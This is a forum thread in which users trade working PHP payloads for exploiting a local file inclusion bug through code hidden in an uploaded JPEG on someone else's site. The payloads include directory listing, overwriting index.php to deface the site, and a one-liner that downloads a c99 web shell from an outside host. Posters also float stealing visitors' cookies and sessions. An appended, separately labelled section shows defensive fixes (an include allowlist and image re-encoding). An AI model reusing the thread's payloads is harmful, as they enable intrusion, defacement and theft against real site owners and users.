
LFI JPEG PHP code


ghost's Avatar
0 0

OK, I found the site that lets users upload JPEG pics and it is vulnerable to LFI. I put a small PHP script in the pic, <? ob_clean(); system("dir"); die; ?>, and it gave me the directory of the site. I echoed a message, <? ob_clean(); system("echo Hello"); die; ?>, and it worked. I was wondering, can a script be used to overwrite the index some way? I tried <? ob_clean(); system("echo La Verdad Estaba Aqui> index.php"); die; ?> but I got an error about some T_string or something.


ghost's Avatar
0 0

Try to open the index file for writing, for example:

<?php $file=fopen("index.php", "w"); fwrite($file,"hacked!"); ?>

That's how I'd try it.


ghost's Avatar
0 0

Are there any tuts on LFI with upload scripts? Am I right in thinking that most upload scripts just take $_FILES and move it from the tmp to another location, so at no point is it executed when it's uploaded? I suppose though, if it's uploaded on the victim server, if anyone views that image you can log their IP/cookie/session etc.?


ghost's Avatar
0 0

I found out what to do: <? fwrite(fopen("./c99.php", "w"), file_get_contents("http://www.place.com/c99.txt")); ?>

It uploads a shell.


ghost's Avatar
0 0

Nice, you could have also, like, printed out password files etc., I guess.

At what stage is that code executed though? When it's first uploaded or when it's viewed on the site?
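
Added example, not part of the thread or any poster's code: a tag embedded in an image is inert while the upload is only moved into place, and runs only when a file-inclusion bug passes that file to the PHP interpreter. The PHP below shows the two defender-side controls that break this chain; the page map, the pages/ directory and both function names are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Hypothetical page map: the only files the front controller may include.
const PAGES = [
    'home'    => __DIR__ . '/pages/home.php',
    'gallery' => __DIR__ . '/pages/gallery.php',
];

// Resolve a request parameter through the map above, so a request value
// is never used as a filesystem path. Unknown names fall back to 'home'.
function resolve_page(string $name): string
{
    return PAGES[$name] ?? PAGES['home'];
}

// Re-encode an uploaded JPEG with GD and store it under a generated name.
// Only decoded pixel data is written back, so comment and metadata
// segments of the original file are not copied to the stored image.
// Returns the stored path, or null if the upload is not a decodable JPEG.
function store_jpeg(string $tmpPath, string $destDir): ?string
{
    $info = @getimagesize($tmpPath);
    if ($info === false || $info[2] !== IMAGETYPE_JPEG) {
        return null;
    }
    $img = @imagecreatefromjpeg($tmpPath);
    if ($img === false) {
        return null;
    }
    // Server-chosen name: the client-supplied filename is never used.
    $dest = rtrim($destDir, '/') . '/' . bin2hex(random_bytes(16)) . '.jpg';
    return imagejpeg($img, $dest, 85) ? $dest : null;
}

// Front controller usage (assumed parameter name 'page'):
//   $page = $_GET['page'] ?? 'home';
//   require resolve_page(is_string($page) ? $page : 'home');
//
// Upload handler usage (assumed form field 'pic'):
//   if (is_uploaded_file($_FILES['pic']['tmp_name'])) {
//       $stored = store_jpeg($_FILES['pic']['tmp_name'], __DIR__ . '/uploads');
//   }
```

The include allowlist is the actual fix for the LFI; re-encoding is a second layer and should not be relied on alone.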